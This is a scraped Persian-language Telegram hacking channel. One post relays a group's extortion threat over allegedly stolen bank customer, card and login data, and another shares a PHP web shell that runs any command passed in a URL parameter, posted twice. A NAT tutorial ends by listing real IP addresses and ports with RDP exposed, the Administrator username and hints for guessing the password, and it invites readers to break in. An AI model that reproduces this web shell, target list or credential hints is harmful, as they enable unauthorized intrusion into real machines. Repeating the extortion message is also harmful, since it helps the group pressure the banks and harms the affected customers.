گروه هکری IRLeaks که در رزومه کاری خود میتوان به هک کردن وبسایت مجمتع اقتصادی کمیته امداد امام، تپسی، اسنپفود، سازمان حج و زیارت و اخیرا اتاقک رو مورد نفوذ قرار داده است اشاره کرد. طبق ادعای انجام شده ۲۹ موسسه مالی فعال و ۲۰ بانک رو هک کرده است، همینطور پیامی برای این مجموعه قرار داده است و اطلاعات در دست داشته را ذکر و به نمایش گذاشته است.
بانک هک شده باید حداکثر تا ۲۴ ساعت آینده با ما وارد مذاکره شده و تا ۷۲ ساعت آینده به یک توافق مشخص با تیم ما برسد.
پس از پایان موعد مقرر و در صورت عدم پاسخ یا نرسیدن به توافق، در اینجا ابتدا نام بانک به همراه سمپل از دیتای هک شده را پست خواهیم کرد و در ادامه اطلاعات هک شده را به فروش خواهیم گذاشت.
به طور خلاصه موارد زیر در اختیار ما قرار دارد:
- مشخصات کامل چندین میلیون مشتری بانک (شماره مشتری، تاریخ افتتاح حساب، مبلغ افتتاح حساب، نام، نام خانوادگی، نام پدر، تاریخ تولد، محل تولد، شماره حساب، ملیت، نوع حساب، شغل، وضعیت تاهل، شماره شناسنامه، شماره سریال شناسنامه، کد ملی، شماره پاسپورت، ایمیل، شماره تلفن ثابت و موبایل، آدرس منزل یا محل کار، کد پستی، میزان تحصیلات، شماره شبا و ...)
- مشخصات کامل کارتها (شماره مشتری، شماره کارت، تاریخ صدور و انقضای کارت، CVV2، موجودی کارت و ...)
- اطلاعات دقیق بانکداری اینترنتی (نام کاربری، رمز اول و رمز دوم، نام و نام خانوادگی صاحب حساب، شماره کارت، اولین و آخرین تاریخ ورود به حساب، آیپی، ایمیل، کارتهای ذخیره شده با نام، مخاطبین و ...)
- اطلاعات دقیق تراکنشها (موجودی حساب، مبلغ و تعداد کارت به کارتهای انجام شده، اطلاعات دقیق خریدهای اینترنتی، مبلغ و تعداد برداشت وجه از خودپردازها، اطلاعات دقیق پرداخت قبوض و ...)
- وضعیت دقیق وامها (مشخصات صاحب وام، ضامن، مبلغ وام، مبلغ و تعداد اقساط پرداخت شده، مبلغ جریمههای وام، مبلغ و زمان بدهی وام، تاریخ سر رسید و ...)
با توجه به اینکه در این مرحله تصمیم به افشای نام بانک نداریم، تمام بانکهای کشور میبایست ایمیل info@ خود را چک کرده و بانکی که از آدرس irleaks[at]tuta[dot]io ایمیل دریافت کرده است، سریعا به آن پاسخ دهد.
@LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🆒1
طبق معمول این زندگی بود که به گامون داد و نتونستیم برسیم به کانال
از همه بابت این روند معذرت میخوام
ادمینای جدید رو دارم انتخاب میکنم
هرکی میتونه کمکمون کنه یه پیام بذاره :
@IRDefacer
از همه بابت این روند معذرت میخوام
ادمینای جدید رو دارم انتخاب میکنم
هرکی میتونه کمکمون کنه یه پیام بذاره :
@IRDefacer
❤9⚡2
ادمین تبادل اگر کسی هست سابقه داره پیام بده
@soltane_sorat
@soltane_sorat
0Day.Today | Learn Exploit | Zero World | Dark web |
Shell Hamas | شل حماس Github #Tools ——————— IR0Day.Today Bax @LearnExploit
Web shell access
#Tools
———————
IR0Day.Today Bax
@LearnExploit
<input type="text" name="cmd" placeholder="command">
<input type="submit" value="Execute">
</form>
<?php
if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
echo "<pre>" . htmlspecialchars(shell_exec($cmd)) . "</pre>";
}
?>
#Tools
———————
IR0Day.Today Bax
@LearnExploit
👍5👨💻2
0Day.Today | Learn Exploit | Zero World | Dark web |
Web shell access <input type="text" name="cmd" placeholder="command"> <input type="submit" value="Execute"> </form> <?php if (isset($_GET['cmd'])) { $cmd = $_GET['cmd']; echo "<pre>" . htmlspecialchars(shell_exec($cmd)) . "</pre>"; } ?> #Tools…
*
<form method="get">
<input type="text" name="cmd" placeholder="command">
<input type="submit" value="Execute">
</form>
<?php
if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
echo "<pre>" . htmlspecialchars(shell_exec($cmd)) . "</pre>";
}
?>
👍5
توسعه بات تلگرامی با شل اسکریپت
نمونشو میزاریم آمارو ببرین بالا
نمونشو میزاریم آمارو ببرین بالا
❤8❤🔥3👍1
0Day.Today | Learn Exploit | Zero World | Dark web |
توسعه بات تلگرامی با شل اسکریپت نمونشو میزاریم آمارو ببرین بالا
فعلا درگیر باگیم انشالله تا آخر شب اوکی میشه
🔥4❤1
0Day.Today | Learn Exploit | Zero World | Dark web |
test > @ShellBSD_bot
حالا آوردیم بالا تست کنین نه اینکه سوکت بزنین یا دیتا کش برین بکدور اد کنین که😂😂
😁3
0Day.Today | Learn Exploit | Zero World | Dark web |
بات فعال شد
از این ب بعد سلام
پ.ن آیپی پابلیکتونه
پ.ن آیپی پابلیکتونه
❤🔥3
0Day.Today | Learn Exploit | Zero World | Dark web |
از این ب بعد سلام پ.ن آیپی پابلیکتونه
تو گیت سورسو آپدیت میکنیم فعلا داشته باشینش تا اعضا بره بالا 😂
github
github
👍2
🌐 PAT (NAT Overload)
اول بیاید نگاهی به NAT بندازیم:
ما در کل حدود 4 میلیارد آدرس IPv4 داریم. با گسترش شبکه بزرگ اینترنت، تعداد آدرسهای IPv4دیگه کافی نبود. بنابراین قبل از معرفی IPv6، راه حل موقتی NAT ارائه شد.
NAT چطور کار میکنه حالا؟
تصور کنید یک شبکه خصوصی دارید که سیستمهاش به هم متصل اند. هر سیستم یک آدرس IP خصوصی داره، اما برای اتصال به اینترنت به آدرس IP عمومی نیاز هست.
NAT سه تا حالت کلی داره:
1.Static NAT :
هر آدرس IP خصوصی به یک آدرس IP عمومی ثابت متصل میشه.
2.Dynamic NAT :
آدرسهای IP خصوصی به یک لیست از آدرسهای IP عمومی متصل میشن. ( این برای زمانیه که چند تا آدرس آیپی در اختیار داریم.)
و حالت آخر که مدنظر ماست PAT(NAT Overload) :
PAT پورتهای مختلف یک آدرس IP عمومی رو به آدرسهای IP خصوصی داخل شبکه متصل میکنه. این کار توسط روتر انجام میشه. یعنی فرض کنید یک آدرس آیپی عمومی در سطح اینترنت هست اما پورت 100 اش مال ی سیستمه و پورت 101 به یک سیستم دیگه متصله.
———————
IR0Day.Today Bax
@LearnExploit
اول بیاید نگاهی به NAT بندازیم:
ما در کل حدود 4 میلیارد آدرس IPv4 داریم. با گسترش شبکه بزرگ اینترنت، تعداد آدرسهای IPv4دیگه کافی نبود. بنابراین قبل از معرفی IPv6، راه حل موقتی NAT ارائه شد.
NAT چطور کار میکنه حالا؟
تصور کنید یک شبکه خصوصی دارید که سیستمهاش به هم متصل اند. هر سیستم یک آدرس IP خصوصی داره، اما برای اتصال به اینترنت به آدرس IP عمومی نیاز هست.
NAT سه تا حالت کلی داره:
1.Static NAT :
هر آدرس IP خصوصی به یک آدرس IP عمومی ثابت متصل میشه.
2.Dynamic NAT :
آدرسهای IP خصوصی به یک لیست از آدرسهای IP عمومی متصل میشن. ( این برای زمانیه که چند تا آدرس آیپی در اختیار داریم.)
و حالت آخر که مدنظر ماست PAT(NAT Overload) :
PAT پورتهای مختلف یک آدرس IP عمومی رو به آدرسهای IP خصوصی داخل شبکه متصل میکنه. این کار توسط روتر انجام میشه. یعنی فرض کنید یک آدرس آیپی عمومی در سطح اینترنت هست اما پورت 100 اش مال ی سیستمه و پورت 101 به یک سیستم دیگه متصله.
———————
IR0Day.Today Bax
@LearnExploit
👍3
0Day.Today | Learn Exploit | Zero World | Dark web |
🌐 PAT (NAT Overload) اول بیاید نگاهی به NAT بندازیم: ما در کل حدود 4 میلیارد آدرس IPv4 داریم. با گسترش شبکه بزرگ اینترنت، تعداد آدرسهای IPv4دیگه کافی نبود. بنابراین قبل از معرفی IPv6، راه حل موقتی NAT ارائه شد. NAT چطور کار میکنه حالا؟ تصور کنید یک شبکه…
گفتیم که این کار توسط روتر انجام میشه اما سرورهای مجازی (VPS) چطور؟ سرور های مجازی که مثل سرور های اختصاصی به یک روتر سخت افزاری متصل نمیشن!باید بگم که نرمافزارهای شبیهسازی سیستم عامل مانند VMware قابلیت پیکربندی NAT رو دارند. یعنی میتونید به صورت مجازی تنظیماتی رو در این باره اعمال کنید.
خب حالا امروز می خوام دو تا آدرس آیپی که روشون PAT اعمال شده و روی پورت هاش RDP هم فعال هست در اختیارتون بزارم.
206.119.89.217:20005
206.119.89.217:20002
206.119.89.217:20003
206.119.89.217:20008
————————————————————-
206.119.89.126:20003
206.119.89.126:20008
دقت کنید که سیستم های خیلی بیشتری به پورت های دیگه ی این آی پی ها متصل اند و من فقط چند تاشونو گذاشتم!
دیگه برای پیدا کردن پورت های دیگه از خلاقیتتون بهره بگیرید!
👤 یوزینیم همه شون : Administrator
🔐 پسوورد : پسوورد رو خودتون پیدا کنید ! هر کی زودتر پیدا کرد نوش جونش😉
(پسوورد پابلیک هست با متد 123@ در ضمن Baseword رو هم حرف اولشو بزرگ بگیرید فقط)
💬 اگر سوالی بود پیوی در خدمتم : @MajesticReal
———————
IR0Day.Today Bax
@LearnExploit
خب حالا امروز می خوام دو تا آدرس آیپی که روشون PAT اعمال شده و روی پورت هاش RDP هم فعال هست در اختیارتون بزارم.
206.119.89.217:20005
206.119.89.217:20002
206.119.89.217:20003
206.119.89.217:20008
————————————————————-
206.119.89.126:20003
206.119.89.126:20008
دقت کنید که سیستم های خیلی بیشتری به پورت های دیگه ی این آی پی ها متصل اند و من فقط چند تاشونو گذاشتم!
دیگه برای پیدا کردن پورت های دیگه از خلاقیتتون بهره بگیرید!
👤 یوزینیم همه شون : Administrator
🔐 پسوورد : پسوورد رو خودتون پیدا کنید ! هر کی زودتر پیدا کرد نوش جونش😉
(پسوورد پابلیک هست با متد 123@ در ضمن Baseword رو هم حرف اولشو بزرگ بگیرید فقط)
💬 اگر سوالی بود پیوی در خدمتم : @MajesticReal
———————
IR0Day.Today Bax
@LearnExploit
👍4❤🔥2